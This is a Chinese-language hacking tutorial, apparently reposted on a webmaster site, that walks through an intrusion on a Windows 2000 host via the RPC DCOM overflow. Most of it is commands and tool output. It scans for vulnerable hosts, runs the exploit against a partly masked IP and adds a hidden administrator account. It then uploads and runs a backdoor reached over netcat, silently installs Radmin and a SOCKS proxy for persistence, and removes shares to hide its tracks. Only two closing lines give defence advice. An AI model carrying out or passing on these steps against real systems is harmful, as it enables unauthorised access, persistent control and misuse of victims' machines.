dcomrpc入侵

2022-9-26 10:54| 查看: 2278 |來(lái)源: 互聯(lián)網(wǎng)

需要的工具：很好的：?radmin.exe 掃描工具: retinarpcdcom.exe 溢出攻擊工具:RpcDcom（通用溢出工具) 腳本開(kāi)啟telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe 代理：sksockser

需要的工具：
很好的：?radmin.exe
掃描工具: retinarpcdcom.exe
溢出攻擊工具:RpcDcom（通用溢出工具)
腳本開(kāi)啟telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe
代理：sksockserver.exe
后門(mén)程序：WinEggDropShellPro3thVersion 好了，該做的都做的差不多了�，F(xiàn)在開(kāi)始把~~ 首先使用retinarpcdcom.exe掃描一個(gè)網(wǎng)段。查找有rpc漏洞的機(jī)子，這個(gè)漏洞需要135端口開(kāi)放，（想必隨便掃一下就會(huì)發(fā)現(xiàn)有許多主機(jī)開(kāi)放的135端口）。。。。。。 (人走運(yùn)座著都能檢到錢(qián)) 211.217.50.xx?第一個(gè)主機(jī)就被掃出來(lái)又此漏洞。開(kāi)始工作看看211.217.50.xx有沒(méi)有其他的漏洞或是若口令之類(lèi)的.我們可以使用流光掃描一下, 好了..看樣子沒(méi)有
其他的缺陷,主機(jī)開(kāi)了3389端口,我們可以上去看一下是xp版本還是win2k 哈哈，是win2k server版本
展開(kāi)命令行： [查看dcomrpc的用法?用法 dcomrpc -d [options]? ] F:\hack>cd rpc\dcomrpc RPC DCOM Expl01t coded by .:[oc192.us]:. Security Complied and Modified by Expl01t www.longker.com Usage: dcomrpc -d [options]
Options:
? -d:????Hostname to attack [Required]
? -t:????Type [Default: 0]
? -r:????Return address [Default: Selected from target]
? -p:????Attack port [Default: 135]
? -l:????Bindshell port [Default: 666] Types:
? 0 [0x0018759f]: [Win2k-Universal]
? 1 [0x0100139d]: [WinXP-Universal]
開(kāi)始進(jìn)行溢出：
F:\hack>cd rpc\dcomrpc -d?211.217.50.xx 0 RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting....Just wait...... 等到出現(xiàn)，說(shuō)明溢出成功
c:\winnt\system32> 接著我們建立用戶(hù) c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。把用戶(hù)添加成超級(jí)管理員
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享開(kāi)了沒(méi)有,沒(méi)有的話(huà)把共享開(kāi)開(kāi) c:\winnt\system32>net share
清單是空的。 c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。到這里我們?nèi)肭指嬉欢温?
[ 建立 IPC$Content$nbsp;連接，也可以使用tftp上傳，先和對(duì)方建立連接] F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; [ 上傳一個(gè) 后門(mén) 程序到對(duì) 方的主機(jī) 里] F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32 F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32 然后運(yùn)行后門(mén)程序，我們可以使用at命令。但是有的機(jī)器把a(bǔ)t明令禁止了，建議直接開(kāi)起telnet
使用opentelnet.exe? 關(guān)閉開(kāi)啟的telnet使用resumetelnet \\ip user password
如果忘記開(kāi)共享可以使用腳本開(kāi)啟telnet來(lái)開(kāi)共享，用法:
cscript telnet.vbe ip user password null port? (null是驗(yàn)證方式) F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567 F:\hack>telnet 211.217.50.xx 4567
省略... 連接并運(yùn)行后門(mén)程序,運(yùn)行后門(mén)程序命令?根目錄：inject.exe -run
（后門(mén)使用方法和安裝都在zip文件里面包含了）后門(mén)端口123456
F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version [Melody]# 下面安裝radmin 配置好的radmin客戶(hù)端有4個(gè)文件。配置radmin客戶(hù)端可參考相關(guān)文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe 把這個(gè)4個(gè)文件copy c:\winnt\system32 在目錄下面執(zhí)行命令
c:\winnt\system32>r_server /s radmin.reg? -----導(dǎo)入注冊(cè)表 c:\winnt\system32>r_server /install /silence -----安裝radmin.并且不顯示托盤(pán) c:\winnt\system32>net start r_server?----- 啟動(dòng)服務(wù)
可以開(kāi)啟3389的話(huà)你自己看著辦把，哈哈
安裝sock代理
把sksockserver.exe copy c:\winnt\system32 c:\winnt\system32>sksockserver /install?????????-----安裝服務(wù) c:\winnt\system32>sksockserver -config port 1234?????----端口定在1234?自己可以改 c:\winnt\system32>sksockserver -config starttype 2????----開(kāi)機(jī)自動(dòng)啟動(dòng) c:\winnt\system32>net start skserver??????????? ----啟動(dòng)服務(wù) 最后刪除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安裝radmin的時(shí)候你發(fā)現(xiàn)有人已經(jīng)安裝了。。怎么辦？走人？--------NO
看操作? (我輸入的內(nèi)容) 后門(mén)連接 F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version [Melody]#（pslist） [Melody]#(pskill r_server) [Melody]#(shell) c:\winnt\system32>(del r_server.exe) c:\winnt\system32>(del admdll.dll) c:\winnt\system32>(del raddrv.dll)
copy你自己的上去，然后安裝省事的辦法直接導(dǎo)入注冊(cè)表，然后重新輸入安裝命令運(yùn)行，就可以了，只是在原來(lái)默認(rèn)端口上面架上了密碼
等等。。。。為什么我輸入導(dǎo)入注冊(cè)表命令不管用呢？出現(xiàn)什么regedit不是可運(yùn)行的程序之類(lèi)的。完了，努力白費(fèi)了。。。。。。。 -----------------------------NO 出現(xiàn)這樣的情況最簡(jiǎn)單的解決辦法telnet上去導(dǎo)入試試看，什么？不是把，有沒(méi)有搞錯(cuò)阿。。。呵呵，盡管放心，去試試看就知道；還可以先運(yùn)行radmin 然后在radmin的dos下導(dǎo)入，也是可以的嗬嗬，去試試看吧
防御辦法：
安裝rpc補(bǔ)丁
使用防火墻過(guò)濾135，445，139等端口

本文最后更新于 2022-9-26 10:54，某些文章具有時(shí)效性，若有錯(cuò)誤或已失效，請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng)：17tui@17tui.com

·END·

站長(zhǎng)網(wǎng)微信號(hào)：w17tui，關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷(xiāo)服務(wù)中心

免責(zé)聲明：本站部分文章和圖片均來(lái)自用戶(hù)投稿和網(wǎng)絡(luò)收集，旨在傳播知識(shí)，文章和圖片版權(quán)歸原作者及原出處所有，僅供學(xué)習(xí)與參考，請(qǐng)勿用于商業(yè)用途，如果損害了您的權(quán)利，請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝！

下一篇：網(wǎng)頁(yè)“黑手”如何入侵你的Windows系統(tǒng) 上一篇：服務(wù)器系統(tǒng)有防火墻的網(wǎng)站入侵過(guò)程

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域，為您提供最新最全的互聯(lián)網(wǎng)資訊，幫助站長(zhǎng)轉(zhuǎn)型升級(jí)，為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷(xiāo)服務(wù)，與站長(zhǎng)一起進(jìn)步！讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)！

掃一掃，關(guān)注站長(zhǎng)網(wǎng)微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

dcomrpc入侵

大家都在看

相關(guān)分類(lèi)

熱門(mén)排行

最近更新